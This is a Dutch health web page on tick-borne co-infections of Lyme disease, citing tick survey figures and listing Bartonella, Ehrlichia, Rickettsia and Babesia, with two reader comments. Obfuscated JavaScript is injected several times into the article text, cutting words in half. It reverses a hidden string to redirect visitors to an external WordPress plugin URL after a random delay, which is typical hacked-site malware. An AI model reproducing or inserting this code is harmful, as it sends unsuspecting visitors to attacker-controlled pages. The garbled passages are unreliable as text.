Co-infecties

Co-infecties bij de ziekte van Lyme

Naast de mogelijkheid dat teken verschillende Borrelia stammen bij zich dragen (B. burgdorferi, afzelii, garinii, valaisiana – en nog tientallen andere Borrelia soorten) kan een teek besmet zijn met vele andere bacteriën, virussen en andere micro-organismen, de zogenoemde co-infecties.

Chinese onderzoekers vonden recent in harde teken maar liefst 237 verschillende bacteriën die waarschijnlijk via een tekenbeet kunnen worden overgebracht op de gastheer; en dit is dan nog exclusief de virussen, protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozoa etc. De meeste van die micro-organismen zijn waarschijnlijk niet schadelijk voor de mens, maar in veel gevallen is daar nauwelijks iets over bekend.

Het aantal co-infecties in teken is relatief hoog en voor lyme patiënten bestaat een reële kans dat ze nog met een ander micro-organisme dan Borrelia geïnfecteerd zijn. Het is aannemelijk dat sommige co-infecties de genezing van lyme patiënten ernstig bemoeilijken. Patiënten die na een antibioticabehandeling geen verbetering ondervinden zouden getest kunnen worden op co-infecties.

Cijfers

In mei 2007 startte het RIVM een langlopend Landelijk Tekenbetenonderzoek. In 2009 werden de eerste percentages van gevonden micro-organismen in teken gepubliceerd. 323 teken waren aan een DNA-onderzoek onderworpen. Gekeken werd naar Borrelia (de verwekker van de ziekte van Lyme) en naar Ehrlichia/Anaplasma, Rickettsia en Babesia. Bijna de helft van de teken (46 procent) bleek besmet te zijn met minimaal één van deze micro-organismen en twaalf procent met meerdere infecties. Bijna een kwart van de teken droeg de Borrelia-bacterie bij zich en eveneens bijna een kwart was besmet met Rickettsia, tien procent met Ehrlichia/Anaplasma en vier procent met Babesia. Vijf procent van de teken bevatte meerderen genotypen van Borrelia tegelijk.

Soorten co-infecties ?

Er zijn veel verschillende co-infecties. Als meest voorkomende co-infecties worden $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonella/”>Bartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonella, EhrlichiaRickettsia en Babesia genoemd. Daarnaast kunnen nog andere infecties door teken overgebracht worden zoals Mycoplasma en de virusinfectie FSME (komt niet voor in Nederland, wel in o.a. delen van Duitsland). Deze bacteriën en virussen worden door meerdere insecten overgebracht wat het probleem nog complexer maakt.

Kijk verder op de website voor meer informatie over de verschillende co-infecties

Facebook reacties

2 Reacties

 • Reply
  NBilo
  12 mei 2016 at 11:20

  Ik heb een coinfectie met mycoplasma opgelopen in Nederland ben 12 jaar geleden gebeten. Dus komt wel voor in Nederland is alleen nog niet zo bekend ga ik vanuit.

  • Reply
   Marleen
   14 mei 2016 at 03:14

   Mycoplasma hoor je best veel. Het gaat om FSME wat niet zo vaak voorkomt. 🙂 Liefs!

  Leave a Reply

  Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.

  %d bloggers liken dit: